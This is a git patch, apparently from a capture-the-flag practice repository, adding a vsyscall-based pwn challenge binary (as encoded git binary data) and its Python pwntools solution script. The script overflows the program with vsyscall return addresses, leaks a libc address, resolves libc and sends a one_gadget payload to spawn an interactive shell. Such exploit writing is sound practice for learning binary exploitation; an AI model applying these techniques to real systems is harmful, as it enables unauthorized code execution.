From 36877e5aa8788047e1045522325d3e89a9a3bc75 Mon Sep 17 00:00:00 2001 From: Jack Ren Date: Wed, 10 Nov 2021 23:00:26 +0800 Subject: [PATCH] vsyscall/vul64 --- vsyscall/vul64/answer.py | 34 ++++++++++++++++++++++++++++++++++ vsyscall/vul64/vul64 | Bin 0 -> 6128 bytes 2 files changed, 34 insertions(+) create mode 100644 vsyscall/vul64/answer.py create mode 100755 vsyscall/vul64/vul64 diff --git a/vsyscall/vul64/answer.py b/vsyscall/vul64/answer.py new file mode 100644 index 0000000..298c1e1 --- /dev/null +++ b/vsyscall/vul64/answer.py @@ -0,0 +1,34 @@ +#!/usr/bin/python2 +# -*- coding:utf-8 -*- + +from pwn import * +from LibcSearcher import * +import os +import time +import struct +context(arch = "amd64",os = "linux", log_level = "debug") + +# context.log_level = "debug" +p = process('./vul64') +elf = ELF('./vul64') + +#gdb.attach(p, "break *0x0000555555554a2b") + +#time.sleep(10) +ret_addr = 0xffffffffff600400 + +with open('input.txt', 'w') as f: + f.write(p64(ret_addr) * 30 + '\x2c') + +p.send(p64(ret_addr) * 30 + '\x2c') +p.recvuntil("I have a gift for yoooou\n") +write_libc = u64(p.recv(8)) +p.recvuntil("Want my flag? Keep going!\n") + +libc = LibcSearcher('write', write_libc) +libc_base = write_libc - libc.dump('write') +system_libc = libc_base + 0x4f3d5 # one_gadget Shift + + +p.send("/bin/sh\x00" + '0' * 0x2f + p32(0x44) + p64(system_libc) + '\n') +p.interactive() diff --git a/vsyscall/vul64/vul64 b/vsyscall/vul64/vul64 new file mode 100755 index 0000000000000000000000000000000000000000..8f0a22de7186939a31a999eebaa223716469dea2 GIT binary patch literal 6128 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 Kn}p19O#cs)J#^9l literal 0 HcmV?d00001